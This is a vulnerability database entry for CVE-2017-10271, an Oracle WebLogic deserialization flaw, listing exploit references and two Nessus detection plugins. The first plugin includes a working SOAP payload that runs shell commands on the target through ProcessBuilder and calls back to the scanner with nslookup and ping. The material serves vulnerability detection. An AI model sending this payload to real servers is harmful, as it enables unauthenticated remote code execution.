CVE-2017-10271 - Unspecified vulnerability in Oracle Weblogic Server
Summary
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows an unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 4 |
Exploit-Db
id | EDB-ID:43392 |
last seen | 2018-11-30 |
modified | 2017-12-26 |
published | 2017-12-26 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/43392 |
title | Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution |

description | Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit). CVE-2017-10271. Remote exploit for Multiple platform. Tags: Metasplo... |
file | exploits/multiple/remote/43924.rb |
id | EDB-ID:43924 |
last seen | 2018-01-29 |
modified | 2018-01-29 |
platform | multiple |
port | |
published | 2018-01-29 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/43924/ |
title | Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit) |
type | remote |

description | Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution. CVE-2017-10271. Remote exploit for Multiple platform |
file | exploits/multiple/remote/43458.py |
id | EDB-ID:43458 |
last seen | 2018-01-24 |
modified | 2018-01-03 |
platform | multiple |
port | |
published | 2018-01-03 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/43458/ |
title | Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution |
type | remote |
Metasploit
description | An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host. |
id | MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE |
last seen | 2020-06-14 |
modified | 2019-05-20 |
published | 2019-04-26 |
references | |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb |
title | Oracle Weblogic Server Deserialization RCE - AsyncResponseService |

description | The Oracle WebLogic WLS WSAT Component is vulnerable to an XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself. |
id | MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE |
last seen | 2020-06-12 |
modified | 2018-01-18 |
published | 2018-01-05 |
references | |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb |
title | Oracle WebLogic wls-wsat Component Deserialization RCE |
Nessus
NASL family | Web Servers |
NASL id | WEBLOGIC_2017_10271.NASL |
description | The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 105484 |
published | 2017-12-28 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/105484 |
title | Oracle WebLogic WSAT Remote Code Execution |
code |

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(105484);
  script_version("1.16");
  script_cvs_date("Date: 2019/11/08");

  script_cve_id("CVE-2017-10271");

  script_name(english:"Oracle WebLogic WSAT Remote Code Execution");
  script_summary(english:"Sends an HTTP POST request and looks for DNS response");

  script_set_attribute(attribute:"synopsis", value:
"The remote Oracle WebLogic server is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects.

An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.");
  # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b680917f");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the October 2017 Oracle Critical Patch Update advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-10271");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/10/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/28");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("weblogic_detect.nasl");
  script_require_keys("www/weblogic");
  script_require_ports("Services/www", 80, 7001);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

appname = "Oracle WebLogic Server";
get_kb_item_or_exit("www/weblogic");
port = get_http_port(default:7001, embedded:FALSE);
get_kb_item_or_exit("www/weblogic/" + port + "/installed");

# establish if WSAT is enabled. If it isn't then we don't
# need to proceed any further
res = http_send_recv3(
  method:'GET',
  item:'/wls-wsat/CoordinatorPortType',
  port:port,
  exit_on_fail:TRUE);
if (empty_or_null(res) || '404' >< res[0])
{
  audit(AUDIT_INST_VER_NOT_VULN, appname);
}

# generate a unique pattern for each execution. unixtime() is not
# granular enough since there may be many installs and this script
# could be running in parallel
pattern = hexstr(rand_str(length:8));

# create the HTTP request that will execute the DNS lookup. We'll try to execute
# via both cmd and sh since we have no real insight into the remote OS.
# Because some minimal Linux installs don't include nslookup, we'll also fallback
# on using ping if necessary... although I think that is mostly paranoia.
ns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();
xml_encoded_java =
  '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">' +
  '<soapenv:Header>' +
  '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">' +
  '<java>' +
  '<void class="java.lang.ProcessBuilder">' +
  '<array class="java.lang.String" length="3" >' +
  '<void index="0">' +
  '<string>cmd.exe</string>' +
  '</void>' +
  '<void index="1">' +
  '<string>/c</string>' +
  '</void>' +
  '<void index="2">' +
  '<string>' + ns_lookup + '</string>' +
  '</void>' +
  '</array>' +
  '<void method="start"/>' +
  '</void>' +
  '<void class="java.lang.ProcessBuilder">' +
  '<array class="java.lang.String" length="3" >' +
  '<void index="0">' +
  '<string>/bin/sh</string>' +
  '</void>' +
  '<void index="1">' +
  '<string>-c</string>' +
  '</void>' +
  '<void index="2">' +
  '<string>' + ns_lookup + '</string>' +
  '</void>' +
  '</array>' +
  '<void method="start"/>' +
  '</void>' +
  '<void class="java.lang.ProcessBuilder">' +
  '<array class="java.lang.String" length="3" >' +
  '<void index="0">' +
  '<string>/bin/sh</string>' +
  '</void>' +
  '<void index="1">' +
  '<string>-c</string>' +
  '</void>' +
  '<void index="2">' +
  '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +
  '</void>' +
  '</array>' +
  '<void method="start"/>' +
  '</void>' +
  '</java>' +
  '</work:WorkContext>' +
  '</soapenv:Header>' +
  '<soapenv:Body/>' +
  '</soapenv:Envelope>';

request =
  'POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n' +
  'Host: ' + get_host_ip() + ':' + port + '\r\n' +
  'Content-Type: text/xml\r\n' +
  'Content-Length: ' + len(xml_encoded_java) + '\r\n' +
  '\r\n' +
  xml_encoded_java;

soc = open_sock_tcp(port);
if (!soc)
{
  audit(AUDIT_SOCK_FAIL, port, appname);
}

filter = "(ip and udp and port 53 and src host " + get_host_ip() +
  ") or (icmp and icmp[0] = 8 and src host " + get_host_ip() + ")";
response = send_capture(socket:soc, data:request, pcap_filter:filter);
close(soc);

if (empty_or_null(response))
{
  # looks like we didn't execute anything on the host
  audit(AUDIT_INST_VER_NOT_VULN, appname);
}

# We can directly search the DNS response
if (pattern >!< response)
{
  # maybe this is an ICMP response?
  icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:"data")));
  if (empty_or_null(icmp_data))
  {
    audit(AUDIT_INST_VER_NOT_VULN, appname);
  }

  if (pattern >!< icmp_data)
  {
    # couldn't find the pattern in the ICMP data
    audit(AUDIT_INST_VER_NOT_VULN, appname);
  }
}

report =
  '\nNessus was able to exploit a Java deserialization vulnerability by' +
  '\nsending a crafted Java object.' +
  '\n';
security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);
```
NASL family | Misc. |
NASL id | ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL |
description | The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 103935 |
published | 2017-10-18 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/103935 |
title | Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU) |
code |

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(103935);
  script_version("1.12");
  script_cvs_date("Date: 2019/11/12");

  script_cve_id(
    "CVE-2017-10152",
    "CVE-2017-10271",
    "CVE-2017-10334",
    "CVE-2017-10336",
    "CVE-2017-10352"
  );
  script_bugtraq_id(101304, 101351, 101392);

  script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)");
  script_summary(english:"Checks for the patch.");

  script_set_attribute(attribute:"synopsis", value:
"An application server installed on the remote host is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities");
  # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1e07fa0e");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the October 2017 Oracle Critical Patch Update advisory.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-10352");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/10/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/10/18");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("oracle_weblogic_server_installed.nbin", "os_fingerprint.nasl");
  script_require_keys("installed_sw/Oracle WebLogic Server");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("install_func.inc");

app_name = "Oracle WebLogic Server";
install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);

ohome = install["Oracle Home"];
subdir = install["path"];
version = install["version"];

fix = NULL;
fix_ver = NULL;

# individual security patches
if (version =~ "^10\.3\.6\.")
{
  fix_ver = "10.3.6.0.171017";
  fix = "26519424";
}
else if (version =~ "^12\.1\.3\.")
{
  fix_ver = "12.1.3.0.171017";
  fix = "26519417";
}
else if (version =~ "^12\.2\.1\.1($|[^0-9])")
{
  fix_ver = "12.2.1.1.171017";
  fix = "26519400";
}
else if (version =~ "^12\.2\.1\.2($|[^0-9])")
{
  fix_ver = "12.2.1.2.171017";
  fix = "26485996";
}

if (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)
{
  os = get_kb_item_or_exit("Host/OS");
  if ('windows' >< tolower(os))
  {
    port = get_kb_item("SMB/transport");
    if (!port) port = 445;
  }
  else port = 0;

  report =
    '\n  Oracle home    : ' + ohome +
    '\n  Install path   : ' + subdir +
    '\n  Version        : ' + version +
    '\n  Required Patch : ' + fix +
    '\n';
  security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);
}
else audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);
```
Packetstorm
data source | https://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt |
id | PACKETSTORM:146143 |
last seen | 2018-01-29 |
published | 2018-01-28 |
reporter | Alexey Tyurin |
source | https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html |
title | Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution |
Saint
bid | 101304 |
description | Oracle WebLogic Server WLS Security Component Deserialization Vulnerability |
id | web_dev_weblogic |
title | weblogic_wls_security_component_deserialization |
type | remote |
Seebug
bulletinFamily | exploit |
description | ### Vulnerability description Attackers are exploiting the WebLogic deserialization vulnerability (CVE-2017-3248) and the WebLogic WLS component vulnerability (CVE-2017-10271) to launch large-scale remote attacks against enterprise servers. A large number of enterprise servers have been compromised, and the number of affected enterprises is clearly rising, so this deserves close attention. Of the two, CVE-2017-10271 is a recent remote code execution vulnerability in the WLS component of Oracle WebLogic; it was exploited in the wild before any details were made public, and many enterprises have not yet installed the patch. The vendor released a patch for this vulnerability in October 2017. The vulnerability is fairly simple to exploit: an attacker only needs to send a carefully crafted HTTP request to gain control of the target server, so the impact is severe. Because the vulnerability is recent, many hosts still have not applied the relevant patch. After this incident, a sharp increase in attacks and the compromise of many more hosts is to be expected. Attackers can target both Windows and Linux hosts and persist on them for a long time. Because Oracle WebLogic is so widely deployed, the attack surface spans every industry. The trojan used in this campaign is a typical Bitcoin-mining trojan, but the vulnerability can also be used by attackers for other purposes. ### Affected versions * Oracle Weblogic Server 10.3.6.0 * Oracle Weblogic Server 12.2.1.2 * Oracle Weblogic Server 12.2.1.1 * Oracle Weblogic Server 12.1.3.0 |
id | SSV:97009 |
last seen | 2018-06-26 |
modified | 2017-12-22 |
published | 2017-12-22 |
reporter | My Seebug |
source | https://www.seebug.org/vuldb/ssvid-97009 |
title | Oracle WebLogic wls-wsat RCE(CVE-2017-10271) |
The Hacker News
id | THN:F03064A70C65D9BD62A8F5898BA276D2 |
last seen | 2018-04-18 |
modified | 2018-04-18 |
published | 2018-04-17 |
reporter | Mohit Kumar |
source | https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html |
title | Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners |